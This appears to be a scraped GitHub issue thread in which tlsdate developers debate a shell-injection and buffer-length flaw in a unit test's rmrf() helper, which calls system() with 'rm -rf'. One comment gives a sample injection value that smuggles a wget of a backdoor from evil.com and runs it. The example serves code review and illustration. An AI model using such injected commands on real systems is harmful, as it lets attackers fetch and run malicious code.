Comments (10)
tlsdated-unittest.c doesn't seem to create a lot of files and it appears easy to just unlink() them when done and then rmdir() the directory instead of relying on rm -rf.
from tlsdate.
I'm not really sure that it counts as shell injection - the goal is to remove whatever directory you give it - so it must be used carefully. I'd take a patch to remove rmrf() entirely but generally, I don't think it is very pressing.
Do you want to propose a patch? I'm thinking about tagging 0.0.7 soon and I'd be happy to merge code that makes you happy if it continues to work as well as expected.
from tlsdate.
It's a shell injection. If I were to pass it the string '/tmp/blah ; wget http://evil.com/backdoor ; ./backdoor &' it would do those things too. Don't call system(3) unless you really want to type junk into the command line.
But this is apparently just test code, so perhaps the rmrf(...) function is not expected to need to be perfect. But still, it's sloppy.
The calls to snprintf() are broken too.
from tlsdate.
Yeah, the reason I lightly debate it being shell injection is that it is a unit test and not an injection from a user; if you can edit the code before compile, I guess you can generally execute arbitrary code.
I'd gladly take a patch though. I didn't write this code and I'm partial to having the original author (@elly) rewrite it.
from tlsdate.
With my security hat on, I find it hard to believe people who see this code would not want to remove it. It does not matter whether it is a unit test or not.
If I tell my collegues we should add this to the bootup of Fedora/RHEL, and they see a buffer overflow and shell injection and "rm -rf " in 4 lines of code, not only will they veto inclusion, they will wonder why I didn't see that before suggesting it for inclusion.
from tlsdate.
I added a proposed fix. The rmrf() function, as presently used (i.e. called on the result of mkdtemp(3)) is safe but I can replace it with some hardcoded unlink(2)/rmdir(2) calls. I do not see the buffer overflow alluded to by @letoams - can you point out exactly where it is?
from tlsdate.
On Thu, 9 May 2013, Elly Fong-Jones wrote:
I added a proposed fix. The rmrf() function, as presently used (i.e. called on the result of mkdtemp(3)) is safe but I can
replace it with some hardcoded unlink(2)/rmdir(2) calls. I do not see the buffer overflow alluded to by @letoams - can you point
out exactly where it is?
buffer overflow was not the right word, sorry. I meant to say if the
"dir" is larger then 256, then you might be deleting a higher level up
directory. eg if you pass "/some/long/mount/paul/" and "/some/long/mount"
is 256 chars, you will be deleting the parent directory. And if
malicious people get to call it using "../../../../../../../../../" then
other bad things can happen. It also segfaults if dir is NULL.
I'm not sure why you use PATH_MAX elsewhere, but not in rmrf for "buf",
or use MAX_PATH - sizeof("rm -rf "), but please don't see this as advise
to fix the rmrf() function :P
Paul
from tlsdate.
it's technically true that it misbehaves in those ways if called improperly, but it's not actually called improperly. If an attacker gets to supply input to rmrf(), they can pass something longer than PATH_MAX and we'll end up truncating it anyway, just to PATH_MAX bytes instead of 256 bytes. They could also pass NULL, causing a crash, but the function is never called in such a way. All of this code is in a unit test and hence never run 'in production'.
from tlsdate.
On Thu, 9 May 2013, Elly Fong-Jones wrote:
it's technically true that it misbehaves in those ways if called improperly, but it's not actually called improperly. If an
attacker gets to supply input to rmrf(), they can pass something longer than PATH_MAX and we'll end up truncating it anyway, just
to PATH_MAX bytes instead of 256 bytes. They could also pass NULL, causing a crash, but the function is never called in such a
way. All of this code is in a unit test and hence never run 'in production'.
I have said all I wanted to say about this issue. And we disagree.
That's fine.
from tlsdate.
I tend to agree with @letoams that static memory allocations are bad news bears but I also think that @elly is correct in that it isn't actually broken. It is skating on the edge of unsafe if someone else trips over it without understanding these points. Lucky us - @elly fixed it! Thanks to @letoams and @Javantea for the feedback!
from tlsdate.
Related Issues (20)
- Long options with arguments don't accept arguments HOT 1
- Test for BIG/LITTLE ENDIAN in test-bio.c
- Time
- minor building issues on debian testing HOT 2
- Sandboxing on other platforms HOT 1
- Tlsdate has no installation candidate HOT 2
- Make tlsdate read proxy environment variables if present
- tlsdate fails to build with openssl-1.1 (new API) HOT 1
- TLS 1.3
- tlsdate-0.0.13 fails to compile with libressl-2.5.0 HOT 1
- Help: How can I disable automatic start of tlsdated? HOT 3
- How do I embed tlsdate into a C++ application? Is there any sort of "libtlsdate"?
- Why times are all different? Only "google.com" returns accurate time! HOT 2
- By default tlsdate uses the non-standard 'nogroup' group
- [EXPIRED] Windows binary
- Last commit 2015, is this project dead? HOT 11
- compile error on raspberrypi HOT 1
- Compile error
- Make error in ubuntu 18.04 HOT 1
- where to find tlsdate servers? HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from tlsdate.